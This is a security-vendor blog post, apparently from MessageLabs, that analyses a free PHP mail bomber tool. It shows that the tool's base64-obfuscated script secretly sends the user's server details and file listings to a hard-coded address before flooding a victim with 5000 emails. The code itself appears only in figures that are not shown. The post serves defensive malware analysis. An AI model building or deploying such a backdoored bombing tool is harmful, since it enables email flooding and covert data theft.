Mail Bomber – it does more than you thought
After spending some time on analysing the mail bomber tool downloaded from spamfordz [dot] com, here is some interesting information noticed.
Fig.1 Files contained in the tool package
To get this work, one needs to upload the files (as shown in Fig. 1 above) to a web server and open index.html file, which opens the mail bomber sform as shown below.
Fig. 2 Mail Bomber form
As the form shows, one just needs to follow the easy steps like entering the victim’s email address, From name, etc, and hit ‘Do It!’ button, the job is done.
Is that simple? Before answering the question, let’s take a look at what it actually does behind the ‘Do It!’ button. After hitting the ‘Do It!’ button, it actually opens file bmb.php, which is contained in the mail bomber package, as shown in Fig.1. What does it contain in the file? After opening it with notepad, we see that there are some base-64 encoded strings, as shown in Fig. 3.
Fig. 3 Base-64 encoded characters
When the file gets executed, it first decodes the base-64 encoded string in the highlighted box-2 on Fig. 3. The decoded scripts are shown in Fig. 4 below.
Fig.4 Base-64 encoded string got decoded
It is interesting to note that the decoded scripts in Fig. 4 contain function base64_decode(), and some other string manipulation operations which then decode the base-64 encoded string in the highlighted box-2 in Fig.3 above. After decoding, it clearly shows what it does, as shown in Fig. 5 below
First, it collects the server information, and iterates through the file names from the directory where the mail bomber index.html file sits and send those information to the hard coded email address, which is servicemhz[at]gmail.com as shown in the highlighted box-1 in the figure.
Secondly, it sends mails to the specified victim’s email address, as shown in the highlighted box-2 above. In this example, it will keep sending 5000 mails to bomb the victim’s mail box
Now we know what it does. When the spammer downloads the free mail bomber tool and uses it to bomb the victim’s mail box, he might not realize that he also becomes a victim by sending his server and files information sitting on the server to the hard coded email address which probably belongs to the mail bomber tool provider. As all the scripts are base-64 encoded, so it is hard to understand what it does without decoding it.
About MessageLabs Intelligence Blog
The MessageLabs Intelligence blog serves as a conduit for communicating MessageLabs Intelligence data, trends and statistics. MessageLabs Team Skeptic™ comprises many world-renowned malware and spam experts, who have a global view of threats across multiple communication protocols drawn from the billions of web pages, email and IM messages they monitor each day on behalf of 21,000 clients in more than 102 countries. Recently on Twitter
- Interested in learning how to apply a #SaaS strategy for messaging security? Register to attend our breakfast seminar: http://cot.ag/50i476February 09, 2010 | 10:01AM
- Join us February for our SaaS breakfast seminar focused on messaging security. Register here: http://cot.ag/50i476February 05, 2010 | 10:36AM
- The latest MessageLabs Intelligence Report and podcast for January 2010 has just been published here http://bit.ly/59o8ELJanuary 22, 2010 | 5:05AM
- Gumblar Botnet ramps us activity: http://bit.ly/7TsHeIJanuary 21, 2010 | 11:15AM
- Dan Bleaken has just posted an update on the MessageLabs Intelligence blog about the latest Haiti earthquake scams: http://bit.ly/4F3EyTJanuary 20, 2010 | 4:16AM